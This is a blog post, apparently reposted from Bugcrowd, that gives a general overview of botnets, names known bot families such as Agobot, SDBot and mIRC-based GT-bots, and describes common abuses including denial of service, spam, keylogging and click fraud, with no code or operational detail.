Source: Bugcrowd
Posted by at No comments:

Botnets


A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.

Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots
These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spyware Its a software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

AdwareIts exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring
A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.


Posted by at No comments:
Subscribe to: Posts (Atom)